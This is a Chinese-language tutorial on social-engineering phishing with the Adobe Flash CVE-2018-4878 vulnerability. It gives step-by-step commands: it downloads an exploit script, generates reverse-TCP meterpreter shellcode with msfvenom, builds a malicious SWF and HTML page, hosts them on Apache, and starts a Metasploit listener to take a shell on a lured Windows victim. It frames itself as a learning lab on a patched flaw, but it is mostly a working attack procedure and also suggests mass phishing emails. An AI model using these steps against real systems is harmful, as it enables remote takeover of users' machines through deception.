Adobe Flash Player社工钓鱼

文章前言

本篇文章主要介绍如何通过利用Adobe Flash Player的漏洞进行社工钓鱼，该漏洞目前已被修复，在实战中利用已不太奏效，仅作为学习

钓鱼实践

影响范围

Adobe Flash Player<=28.0.0.137

漏洞简介

2018年2月1号，Adobe官方发布安全通报(APSA18-01)，声明Adobe Flash 28.0.0.137及其之前的版本，存在高危漏洞，攻击者可以通过构造特殊的Flash链接，之后诱导用户用浏览器/邮件/Office访问此Flash链接，从而实现"远程代码执行"，并且直接被Getshell，该漏洞于2017年底由韩国计算机应急小组(KR-CERT)首次发现

演示环境

• 攻击主机：Kali Linux
• 目标主机：Windows 7 sp1
• 漏洞载荷：CVE-2018-4878.py
• flash版本：flashplayer_activex_28.0.0.137.exe

钓鱼演示

Step 1：下载漏洞利用脚本

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

Step 2：修改载荷，将代码中的stageless变量改成"stageless = False"

Step 3：使用msf生成shellcode

msfvenom -p  windows/meterpreter/reverse_tcp  lhost=192.168.174.131 lport=5678  -f  python>shellcode.txt

Step 4：之替换CVE-2018-4878中的shellcode

Step 5：修改CVE-2018-4878.py下面的文件信息

Step 6：使用Python执行CVE-2018-4878.py代码，之后生成exploit.swf文件和index.html文件

Step 7：之后在Kali Linux开启Apache2服务，并将上面的2个文件放入/var/www/html目录中(Apache web路径）

Step 8：Kali Linux开启Shell会话监听

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
msf exploit(handler) > set lhost 192.168.174.131
msf exploit(handler) > set lport 5678 
msf exploit(handler) > exploit

Step 9：诱导用户通过IE浏览器访问页面

Step 10：Kali Linux 上获取meterpreter shell:

文末小结

从上面的演示中可以看到最终由于Flash存在CVE-2018-4878高危漏洞，导致Windows靶机访问含flash的页面时，直接被Kali Linux控制，真实环境下，很多黑客基于此Flash漏洞，结合社会工程学，例如将网页链接放置在诱导邮件中，欺骗大量用户点击，来达到最规模攻击效果